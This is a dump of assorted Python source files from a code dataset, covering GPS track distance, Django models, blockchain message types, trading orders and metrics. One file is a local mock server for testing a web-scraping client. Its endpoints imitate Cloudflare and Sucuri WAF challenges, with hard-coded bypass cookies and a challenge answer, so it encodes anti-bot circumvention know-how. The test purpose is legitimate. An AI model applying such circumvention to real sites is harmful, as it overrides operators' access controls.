content | type
---|---
stringlengths 0–894k | stringclasses (2 values)
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
from datetime import date, datetime
from lxml import etree
from geopy.distance import vincenty
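# Note: geopy removed `vincenty` in geopy 2.0; `geodesic` is its drop-in
# replacement there and its result exposes the same `.kilometers` attribute.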
def main(arguments: Namespace):
aggregated_total_distance = sum(
track_distance(gpx_file)
for gpx_file in arguments.gpx_files)
print('Total distance in kilometers:', aggregated_total_distance)
def track_distance(gpx_file_path: str):
"""Calculate the total distance of a GPX track."""
root = etree.parse(gpx_file_path).getroot()
points = root.findall('*//trkpt', root.nsmap)
distance = sum(
vincenty(
(first.get('lat'), first.get('lon')),
(second.get('lat'), second.get('lon'))
).kilometers
for first, second in zip(
points[0:], points[1:])
)
return distance
def track_day(gpx_file_path: str) -> date:
"""
Determine the day of a GPX file.
"""
root = etree.parse(gpx_file_path).getroot()
points = root.findall('*//trkpt/time', root.nsmap)
assert points, 'empty GPX file provided {}'.format(gpx_file_path)
times = {
datetime.fromisoformat(point.text[:10]).date()
for point in points
}
assert len(times) == 1, 'GPX spans multiple days {}'.format(gpx_file_path)
return times.pop()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('gpx_files', nargs='+')
main(parser.parse_args())
|
python
|
from django.contrib import admin
from .models import Tutorial, Complemento
admin.site.register(Tutorial)
admin.site.register(Complemento)
|
python
|
# Generated by Django 2.1.3 on 2019-06-23 15:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pdfmerge', '0013_auto_20190623_1536'),
]
operations = [
migrations.AlterField(
model_name='pdfformfield',
name='field_choice',
field=models.CharField(choices=[('NONE', 'NONE'), ('FULLDATE', 'FULLDATE'), ('DATE', 'DATE'), ('MONTH', 'MONTH'), ('YEAR', 'YEAR'), ('FULLDATE_TEXT_MONTH', 'FULLDATE_TEXT_MONTH'), ('CHECK_BOX', 'CHECK_BOX')], default='NONE', max_length=20),
),
migrations.AlterField(
model_name='pdfformfield',
name='font_size',
field=models.IntegerField(default=12),
),
]
|
python
|
# (C) Datadog, Inc. 2018
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
try:
# Agent5 compatibility layer
from checks.libs.win.pdhbasecheck import PDHBaseCheck
from checks.libs.win.winpdh import WinPDHCounter
except ImportError:
from .winpdh_base import PDHBaseCheck
from .winpdh import WinPDHCounter
__all__ = [
'PDHBaseCheck',
'WinPDHCounter',
]
|
python
|
from __future__ import print_function
from __future__ import absolute_import
import cv2
from .tesisfunctions import Plotim,overlay,padVH
import numpy as np
from RRtoolbox.lib.plotter import Imtester
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_morphological_ops/py_morphological_ops.html
# http://opencv-python-tutroals.readthedocs.org/en/latest/py_tutorials/py_imgproc/py_filtering/py_filtering.html
# http://people.csail.mit.edu/sparis/bf_course/
if __name__=="__main__":
#img= cv2.resize(cv2.imread(r"asift2fore.png"),(400,400))
img = cv2.resize(cv2.imread(r'im1_2.jpg'),(400,400))
#img = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
#img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
test = Imtester(img)
print(test.info)
|
python
|
"""Bank module message types."""
from __future__ import annotations
import copy
from typing import List
from secret_sdk.core import AccAddress, Coins
from secret_sdk.core.msg import Msg
from secret_sdk.util.json import JSONSerializable, dict_to_data
__all__ = ["MsgSend", "MsgMultiSend", "MultiSendIO"]
import attr
@attr.s
class MsgSend(Msg):
"""Send tokens message
Args:
from_address: address of sender
to_address: address of recipient
coins: coins to be sent.
"""
type = "cosmos-sdk/MsgSend"
""""""
from_address: AccAddress = attr.ib()
to_address: AccAddress = attr.ib()
amount: Coins = attr.ib(converter=Coins, factory=Coins)
def to_data(self) -> dict:
d = copy.deepcopy(self.__dict__)
return {"type": self.type, "value": dict_to_data(d)}
@classmethod
def from_data(cls, data: dict) -> MsgSend:
data = data["value"]
return cls(
from_address=data["from_address"],
to_address=data["to_address"],
amount=Coins.from_data(data["amount"]),
)
@attr.s
class MultiSendIO(JSONSerializable):
"""Organizes data for MsgMultiSend input/outputs. Expects data to be provided in the
format:
.. code-block:: python
{
"address": "secret1...",
"coins": "123456789uscrt"
}
"""
address: AccAddress = attr.ib()
"""Input / output address."""
coins: Coins = attr.ib(converter=Coins)
"""Coins to be sent / received."""
@classmethod
def from_data(cls, data: dict):
return cls(address=data["address"], coins=Coins.from_data(data["coins"]))
def convert_io_list(data: list) -> List[MultiSendIO]:
if all(isinstance(x, MultiSendIO) for x in data):
return data
else:
return [MultiSendIO(address=d["address"], coins=d["coins"]) for d in data]
@attr.s
class MsgMultiSend(Msg):
"""Allows batch-sending between multiple source and destination addresses.
The total amount of coins in ``inputs`` must match ``outputs``. The transaction
containing ``MsgMultiSend`` must contain signatures from all addresses used as inputs.
The ``inputs`` and ``outputs`` arguments should be of the form:
.. code-block:: python
[{
"address": "secret1...",
"coins": "123456789uusd"
},
{
"address": "secret12...",
"coins": "2983298ukrw,21323uusd"
}]
Args:
inputs (List[MultiSendIO]): senders and amounts
outputs (List[MultiSendIO]): recipients and amounts
"""
type = "bank/MsgMultiSend"
""""""
action = "multisend"
""""""
inputs: List[MultiSendIO] = attr.ib(converter=convert_io_list)
outputs: List[MultiSendIO] = attr.ib(converter=convert_io_list)
@classmethod
def from_data(cls, data: dict) -> MsgMultiSend:
data = data["value"]
return cls(
inputs=[MultiSendIO.from_data(x) for x in data["inputs"]],
outputs=[MultiSendIO.from_data(x) for x in data["outputs"]],
)
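# A hedged usage sketch (not part of the original module; the addresses are the
# placeholder values from the docstrings above). The attrs converters accept
# plain dicts and coin strings in the documented format, so a simple two-party
# multisend can be built directly:
if __name__ == "__main__":
    _example = MsgMultiSend(
        inputs=[{"address": "secret1...", "coins": "1000uscrt"}],
        outputs=[{"address": "secret1...", "coins": "1000uscrt"}],
    )
    print(_example.inputs, _example.outputs)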
|
python
|
from datetime import datetime
import numpy as np
from pixiu.api.defines import (OrderCommand)
from pixiu.api.utils import (parse_datetime_string)
class Order(object):
def __init__(self, params={'volume': 0}):
self.order_dict = params.copy()
open_time = self.order_dict.get("open_time", None)
if open_time is not None:
if isinstance(open_time, int) or isinstance(open_time, float):
self.order_dict["open_time"] = datetime.fromtimestamp(open_time)
else:
self.order_dict["open_time"] = parse_datetime_string(open_time)
close_time = self.order_dict.get("close_time", None)
if close_time is not None:
if isinstance(close_time, int) or isinstance(close_time, float):
self.order_dict["close_time"] = datetime.fromtimestamp(close_time)
else:
self.order_dict["close_time"] = parse_datetime_string(close_time)
self.order_dict["commission"] = self.order_dict.get("commission", 0.0)
self.order_dict["swap"] = self.order_dict.get("swap", 0.0)
#cmd upper
cmd = self.order_dict.get("cmd", None)
if cmd is not None:
self.order_dict["cmd"] = cmd.upper()
def clone(self):
return Order(self.order_dict.copy())
def is_long(self) -> bool:
long_types = [OrderCommand.BUY, OrderCommand.BUYLIMIT, OrderCommand.BUYSTOP]
# cmd = self.cmd.upper()
return self.cmd in long_types
def is_short(self) -> bool:
long_types = [OrderCommand.SELL, OrderCommand.SELLLIMIT, OrderCommand.SELLSTOP]
# cmd = self.cmd.upper()
return self.cmd in long_types
def is_market(self) -> bool:
market_types = [OrderCommand.BUY, OrderCommand.SELL]
# cmd = self.cmd.upper()
return self.cmd in market_types
def is_stop(self) -> bool:
stop_types = [OrderCommand.BUYSTOP, OrderCommand.SELLSTOP]
# cmd = self.cmd.upper()
return self.cmd in stop_types
def is_limit(self) -> bool:
limit_types = [OrderCommand.BUYLIMIT, OrderCommand.SELLLIMIT]
# cmd = self.cmd.upper()
return self.cmd in limit_types
def is_pending(self) -> bool:
return self.is_limit() or self.is_stop()
@property
def uid(self) -> str:
return str(self.order_dict["uid"])
@property
def ticket(self) -> str:
return str(self.order_dict.get("order_id", self.order_dict.get("ticket", None)))
@property
def profit(self) -> float:
return float(self.order_dict.get("profit", 0))
@property
def margin(self) -> float:
ret = self.order_dict.get("margin", None)
return float(ret) if ret is not None else None
@property
def take_profit(self) -> float:
value = self.order_dict.get("take_profit", None)
if value is None:
return None
return float(value)
@property
def stop_loss(self) -> float:
value = self.order_dict.get("stop_loss", None)
if value is None:
return None
return float(value)
@property
def comment(self):
return self.order_dict["comment"]
@property
def symbol(self):
return str(self.order_dict["symbol"])
@property
def cmd(self):
return str(self.order_dict["cmd"])
@property
def volume(self) -> float:
return float(self.order_dict["volume"])
@property
def commission(self) -> float:
return float(self.order_dict["commission"])
@property
def swap(self) -> float:
return float(self.order_dict["swap"])
@property
def magic_number(self) -> int:
ret = self.order_dict.get("magic_number", None)
return int(ret) if ret is not None else None
@property
def open_price(self) -> float:
return float(self.order_dict["open_price"])
@property
def open_time(self):
return self.order_dict["open_time"]
@property
def close_time(self):
return self.order_dict["close_time"]
@property
def close_price(self):
return self.order_dict["close_price"] if self.order_dict["close_price"] is not None and not np.isnan(self.order_dict["close_price"]) else None
@property
def description(self):
return self.order_dict["description"]
@property
def from_uid(self) -> str:
return self.order_dict.get("from_uid", None)
@property
def to_uid(self) -> str:
return self.order_dict.get("to_uid", None)
@property
def group_uid(self) -> str:
return self.order_dict.get("group_uid", None)
@property
def tags(self) -> str:
return self.order_dict.get("tags", None)
|
python
|
import numpy as np
def eval_q2m(scores, q2m_gts):
'''
Image -> Text / Text -> Image
Args:
scores: (n_query, n_memory) matrix of similarity scores
q2m_gts: list, each item is the positive memory ids of the query id
Returns:
scores: (recall@1, 5, 10, median rank, mean rank)
gt_ranks: the best ranking of ground-truth memories
'''
n_q, n_m = scores.shape
gt_ranks = np.zeros((n_q, ), np.int32)
for i in range(n_q):
s = scores[i]
sorted_idxs = np.argsort(-s)
rank = n_m
for k in q2m_gts[i]:
tmp = np.where(sorted_idxs == k)[0][0]
if tmp < rank:
rank = tmp
gt_ranks[i] = rank
# compute metrics
r1 = 100 * len(np.where(gt_ranks < 1)[0]) / n_q
r5 = 100 * len(np.where(gt_ranks < 5)[0]) / n_q
r10 = 100 * len(np.where(gt_ranks < 10)[0]) / n_q
medr = np.median(gt_ranks) + 1
meanr = gt_ranks.mean() + 1
return (r1, r5, r10, medr, meanr)
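# A small usage sketch (not part of the original module): two queries scored
# against three memories; query 0's ground truth ranks first and query 1's
# ranks second, so recall@1 is 50.0 while recall@5 and recall@10 are 100.0.
if __name__ == "__main__":
    scores = np.array([[0.1, 0.9, 0.3],
                       [0.8, 0.2, 0.5]])
    q2m_gts = [[1], [2]]
    print(eval_q2m(scores, q2m_gts))  # recalls 50.0/100.0/100.0, median rank 1.5, mean rank 1.5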
|
python
|
import traceback
import uuid
import socket
import logging
import os
import base64
import zlib
import gzip
import time
import datetime
from http import cookies
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
from threading import Thread
import WebRequest
def capture_expected_headers(expected_headers, test_context, is_chromium=False, is_selenium_garbage_chromium=False, is_annoying_pjs=False, skip_header_checks=False):
# print("Capturing expected headers:")
# print(expected_headers)
assert isinstance(expected_headers, dict), "expected_headers must be a dict. Passed a %s" % type(expected_headers)
for key, val in expected_headers.items():
assert isinstance(key, str)
assert isinstance(val, str)
cookie_key = uuid.uuid4().hex
log = logging.getLogger("Main.TestServer")
sucuri_reqs_1 = 0
sucuri_reqs_2 = 0
sucuri_reqs_3 = 0
class MockServerRequestHandler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
return
def validate_headers(self):
for key, value in expected_headers.items():
if (is_annoying_pjs or is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept-Encoding':
# So PhantomJS monkeys with accept-encoding headers
# Just ignore that particular header, I guess.
pass
# Selenium does not allow overriding the user-agent
# and other assorted parameters via its API at all.
elif (is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept-Language':
pass
elif (is_annoying_pjs or is_chromium or is_selenium_garbage_chromium or skip_header_checks) and key == 'Accept':
pass
elif not skip_header_checks:
v1 = value.replace(" ", "")
v2 = self.headers[key]
if v2 is None:
v2 = ""
v2 = v2.replace(" ", "")
test_context.assertEqual(v1, v2, msg="Mismatch in header parameter '{}' : '{}' -> '{}' ({})".format(
key,
value,
self.headers[key],
{
'is_annoying_pjs' : is_annoying_pjs,
'is_chromium' : is_chromium,
'is_selenium_garbage_chromium' : is_selenium_garbage_chromium,
'skip_header_checks' : skip_header_checks,
},
)
)
def _get_handler(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
# print("Path: ", self.path)
# print("Headers: ", self.headers)
# print("Cookie(s): ", self.headers.get_all('Cookie', failobj=[]))
try:
self.validate_headers()
except Exception:
self.send_response(500)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Headers failed validation!")
raise
if self.path == "/":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/favicon.ico":
self.send_response(404)
self.end_headers()
elif self.path == "/raw-txt":
self.send_response(200)
self.send_header('Content-type', "text/plain")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/html-decode":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"Root OK?")
elif self.path == "/html/real":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Root OK?</body></html>")
elif self.path == "/compressed/deflate":
self.send_response(200)
self.send_header('Content-Encoding', 'deflate')
self.send_header('Content-type', "text/html")
self.end_headers()
inb = b"Root OK?"
cobj = zlib.compressobj(wbits=-zlib.MAX_WBITS)
t1 = cobj.compress(inb) + cobj.flush()
self.wfile.write(t1)
elif self.path == "/compressed/gzip":
self.send_response(200)
self.send_header('Content-Encoding', 'gzip')
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(gzip.compress(b"Root OK?"))
elif self.path == "/json/invalid":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"LOLWAT")
elif self.path == "/json/valid":
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b'{"oh" : "hai"}')
elif self.path == "/json/no-coding":
self.send_response(200)
self.end_headers()
self.wfile.write(b'{"oh" : "hai"}')
elif self.path == "/filename/path-only.txt":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename/path-only-trailing-slash/":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename/content-disposition":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.txt")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/path-only.txt":
self.send_response(200)
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.txt")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-html-suffix":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.html")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-1":
self.send_response(200)
self.send_header('Content-Disposition', "filename='lolercoaster.html'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-2":
self.send_response(200)
self.send_header('Content-Disposition', "filename=\'lolercoaster.html\'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-spaces-1":
self.send_response(200)
self.send_header('Content-Disposition', "filename='loler coaster.html'")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/content-disposition-quotes-spaces-2":
self.send_response(200)
self.send_header('Content-Disposition', "filename=\"loler coaster.html\"")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/filename_mime/explicit-html-mime":
self.send_response(200)
self.send_header('Content-Disposition', "filename=lolercoaster.html")
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"LOLWAT?")
elif self.path == "/redirect/bad-1":
self.send_response(302)
self.end_headers()
elif self.path == "/redirect/bad-2":
self.send_response(302)
self.send_header('location', "bad-2")
self.end_headers()
elif self.path == "/redirect/bad-3":
self.send_response(302)
self.send_header('location', "gopher://www.google.com")
self.end_headers()
elif self.path == "/redirect/from-1":
self.send_response(302)
self.send_header('location', "to-1")
self.end_headers()
elif self.path == "/redirect/to-1":
self.send_response(200)
self.end_headers()
self.wfile.write(b"Redirect-To-1")
elif self.path == "/redirect/from-2":
self.send_response(302)
self.send_header('uri', "to-2")
self.end_headers()
elif self.path == "/redirect/to-2":
self.send_response(200)
self.end_headers()
self.wfile.write(b"Redirect-To-2")
elif self.path == "/redirect/from-3":
self.send_response(302)
newurl = "http://{}:{}".format(self.server.server_address[0], self.server.server_address[1])
self.send_header('uri', newurl)
self.end_headers()
elif self.path == "/password/expect":
# print("Password")
# print(self.headers)
self.send_response(200)
self.end_headers()
if not 'Authorization' in self.headers:
self.wfile.write(b"Password not sent!!")
return
val = self.headers['Authorization']
passval = val.split(" ")[-1]
passstr = base64.b64decode(passval)
if passstr == b'lol:wat':
self.wfile.write(b"Password Ok?")
else:
self.wfile.write(b"Password Bad!")
elif self.path == "/content/have-title":
self.send_response(200)
self.end_headers()
self.wfile.write(b"<html><head><title>I can haz title?</title></head><body>This page has a title!</body></html>")
elif self.path == "/content/no-title":
self.send_response(200)
self.end_headers()
self.wfile.write(b"<html><head></head><body>This page has no title. Sadface.jpg</body></html>")
elif self.path == "/binary_ctnt":
self.send_response(200)
self.send_header('Content-type', "image/jpeg")
self.end_headers()
self.wfile.write(b"Binary!\x00\x01\x02\x03")
elif self.path == "/binary_ctnt":
self.send_response(200)
self.send_header('Content-type', "image/jpeg")
self.end_headers()
self.wfile.write(b"Binary!\x00\x01\x02\x03")
##################################################################################################################################
# Cookie stuff
##################################################################################################################################
elif self.path == '/cookie_test':
cook = cookies.SimpleCookie()
cook['cookie_test_key'] = cookie_key
cook['cookie_test_key']['path'] = "/"
cook['cookie_test_key']['domain'] = ""
expiration = datetime.datetime.now() + datetime.timedelta(days=30)
cook['cookie_test_key']["expires"] = expiration.strftime("%a, %d-%b-%Y %H:%M:%S PST")
self.send_response(200)
self.send_header('Content-type', "text/html")
self.send_header('Set-Cookie', cook['cookie_test_key'].OutputString())
self.end_headers()
self.wfile.write(b"<html><body>CF Cookie Test</body></html>")
elif self.path == '/cookie_require':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cookie_test_key' and cook_value == cookie_key:
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Cookie forwarded properly!</body></html>")
return
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><body>Cookie is missing</body></html>")
##################################################################################################################################
# Sucuri validation
##################################################################################################################################
elif self.path == '/sucuri_shit_3':
# I'd like to get this down to just 2 requests (cookie bounce, and fetch).
# Doing that requires pulling html content out of chromium, though.
# Annoying.
nonlocal sucuri_reqs_3
sucuri_reqs_3 += 1
if sucuri_reqs_3 > 3:
raise RuntimeError("Too many requests to sucuri_shit_3 (%s)!" % sucuri_reqs_3)
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target preemptive Sucuri page!</title></head><body>Preemptive waf circumvented OK (p3)?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/sucuri_shit_2':
# This particular path is the one we should already have a cookie for.
# As such, we expect one request only
nonlocal sucuri_reqs_2
sucuri_reqs_2 += 1
if sucuri_reqs_2 > 1:
raise RuntimeError("Too many requests to sucuri_shit_2 (%s)!" % sucuri_reqs_2)
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target preemptive Sucuri page!</title></head><body>Preemptive waf circumvented OK (p2)?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/sucuri_shit':
nonlocal sucuri_reqs_1
sucuri_reqs_1 += 1
if sucuri_reqs_1 > 4:
raise RuntimeError("Too many requests to sucuri_shit (%s)!" % sucuri_reqs_1)
# print("Fetch for ", self.path)
# print("Cookies:", self.headers.get_all('Cookie', failobj=[]))
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'sucuri_cloudproxy_uuid_6293e0004' and cook_value == '04cbb56494ebedbcd19a61b2d728c478':
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target Sucuri page!</title></head><body>Sucuri Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'sucuri_garbage.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(plain_contents)
##################################################################################################################################
# Cloudflare validation
##################################################################################################################################
elif self.path == '/cloudflare_under_attack_shit_2':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cloudflare_validate_key' and cook_value == cookie_key:
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target CF page!</title></head><body>CF Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'cf_js_challenge_03_12_2018.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.server_version = "cloudflare is garbage"
self.send_response(503)
self.send_header('Server', "cloudflare is garbage")
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/cloudflare_under_attack_shit':
if self.headers.get_all('Cookie', failobj=[]):
cook = self.headers.get_all('Cookie', failobj=[])[0]
cook_key, cook_value = cook.split("=", 1)
if cook_key == 'cloudflare_validate_key' and cook_value == cookie_key:
# if cook['']
self.send_response(200)
self.send_header('Content-type', "text/html")
self.end_headers()
self.wfile.write(b"<html><head><title>At target CF page!</title></head><body>CF Redirected OK?</body></html>")
return
container_dir = os.path.dirname(__file__)
fpath = os.path.join(container_dir, "waf_garbage", 'cf_js_challenge_03_12_2018.html')
with open(fpath, "rb") as fp:
plain_contents = fp.read()
self.server_version = "cloudflare is garbage"
self.send_response(503)
self.send_header('Server', "cloudflare is garbage")
self.send_header('Content-type','text/html')
self.end_headers()
self.wfile.write(plain_contents)
elif self.path == '/cdn-cgi/l/chk_jschl?jschl_vc=427c2b1cd4fba29608ee81b200e94bfa&pass=1543827239.915-44n9IE20mS&jschl_answer=9.66734594':
cook = cookies.SimpleCookie()
cook['cloudflare_validate_key'] = cookie_key
cook['cloudflare_validate_key']['path'] = "/"
cook['cloudflare_validate_key']['domain'] = ""
expiration = datetime.datetime.now() + datetime.timedelta(days=30)
cook['cloudflare_validate_key']["expires"] = expiration.strftime("%a, %d-%b-%Y %H:%M:%S PST")
self.send_response(200)
self.send_header('Content-type', "text/html")
self.send_header('Set-Cookie', cook['cloudflare_validate_key'].OutputString())
self.end_headers()
body = "<html><body>Setting cookies.<script>window.location.href='/cloudflare_under_attack_shit'</script></body></html>"
self.wfile.write(body.encode("utf-8"))
##################################################################################################################################
# Handle requests for an unknown path
##################################################################################################################################
else:
test_context.assertEqual(self.path, "This shouldn't happen!")
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
log.info("Request for URL path: '%s'", self.path)
# print("Headers: ", self.headers)
# print("Cookie(s): ", self.headers.get_all('Cookie', failobj=[]))
try:
return self._get_handler()
except Exception as e:
log.error("Exception in handler!")
for line in traceback.format_exc().split("\n"):
log.error(line)
raise e
return MockServerRequestHandler
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def start_server(assertion_class,
from_wg,
port_override = None,
is_chromium = None,
is_selenium_garbage_chromium = False,
is_annoying_pjs = False,
skip_header_checks = False
):
# Configure mock server.
if port_override:
mock_server_port = port_override
else:
mock_server_port = get_free_port()
expected_headers = dict(from_wg.browserHeaders)
print(from_wg)
print(expected_headers)
assert isinstance(expected_headers, dict)
captured_server = capture_expected_headers(
expected_headers = expected_headers,
test_context = assertion_class,
is_chromium = is_chromium,
is_selenium_garbage_chromium = is_selenium_garbage_chromium,
is_annoying_pjs = is_annoying_pjs,
skip_header_checks = skip_header_checks
)
retries = 4
for x in range(retries + 1):
try:
mock_server = HTTPServer(('0.0.0.0', mock_server_port), captured_server)
break
except OSError:
time.sleep(0.2)
if x >= retries:
raise
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.daemon = True
mock_server_thread.start()
return mock_server_port, mock_server, mock_server_thread
if __name__ == '__main__':
wg = WebRequest.WebGetRobust()
srv = start_server(
assertion_class = None,
from_wg = wg,
skip_header_checks = True)
print("running server on port: ", srv)
while 1:
time.sleep(1)
|
python
|
import json
from concurrent.futures import ThreadPoolExecutor
import psutil
from notebook.base.handlers import IPythonHandler
from tornado import web
from tornado.concurrent import run_on_executor
try:
# Traitlets >= 4.3.3
from traitlets import Callable
except ImportError:
from .utils import Callable
class ApiHandler(IPythonHandler):
executor = ThreadPoolExecutor(max_workers=5)
@web.authenticated
async def get(self):
"""
Calculate and return current resource usage metrics
"""
config = self.settings["jupyter_resource_usage_display_config"]
cur_process = psutil.Process()
all_processes = [cur_process] + cur_process.children(recursive=True)
# Get memory information
rss = sum([p.memory_info().rss for p in all_processes])
if callable(config.mem_limit):
mem_limit = config.mem_limit(rss=rss)
else: # mem_limit is an Int
mem_limit = config.mem_limit
limits = {"memory": {"rss": mem_limit}}
if config.mem_limit and config.mem_warning_threshold != 0:
limits["memory"]["warn"] = (mem_limit - rss) < (
mem_limit * config.mem_warning_threshold
)
metrics = {"rss": rss, "limits": limits}
# Optionally get CPU information
if config.track_cpu_percent:
cpu_count = psutil.cpu_count()
cpu_percent = await self._get_cpu_percent(all_processes)
if config.cpu_limit != 0:
limits["cpu"] = {"cpu": config.cpu_limit}
if config.cpu_warning_threshold != 0:
limits["cpu"]["warn"] = (config.cpu_limit - cpu_percent) < (
config.cpu_limit * config.cpu_warning_threshold
)
metrics.update(cpu_percent=cpu_percent, cpu_count=cpu_count)
self.write(json.dumps(metrics))
@run_on_executor
def _get_cpu_percent(self, all_processes):
def get_cpu_percent(p):
try:
return p.cpu_percent(interval=0.05)
# Avoid littering logs with stack traces complaining
# about dead processes having no CPU usage
except psutil.Error:
return 0
return sum([get_cpu_percent(p) for p in all_processes])
|
python
|
NOT_CONTINUATION = -1
CONTINUATION_START = 0
CONTINUATION = 1
CONTINUATION_END = 2
CONTINUATION_EXPLICIT = 3
#A base class whose subclasses provide the correct set of language regex expressions
#for functions and function-like objects.
class languageSwitcher(object):
def __init__(self, ext):
self.lang = ""
self.extensions = ext
def getLanguage(self):
return self.lang
def getExtensions(self):
'''
Return the set of file extensions associated with this language.
'''
return self.extensions
#--- -> boolean
#Returns true if this is a recognized language that has classes,
#and false if it is a recognized language that doesn't contain classes.
def isObjectOrientedLanguage(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Grab regexes associated with function expressions in our language
def getFunctionRegexes(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be functions
def cleanFunctionLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Given a well formed line matched against one of our language's
#regular expression, retrieve the function name.
def parseFunctionName(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be classes
def cleanClassLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Is this name a valid class name by the rules for our language?
def isValidClassName(self, classContext):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get regexes associated with class declarations in our language
def getClassRegexes(self):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#For preprocessing lines that might be constructors or Destructors
def cleanConstructorOrDestructorLine(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Additional cleaning for constructors + destructors
def shortenConstructorOrDestructor(self, toShorten):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get Constructor/Destructor regex
def getConstructorOrDestructorRegex(self, classContext):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the index for the start of a block comment
def getBlockCommentStart(self, line):
raise NotImplementedError("Base LangSwitcher is Abstract.")
#Get the index for the end of a block comment
def getBlockCommentEnd(self, line):
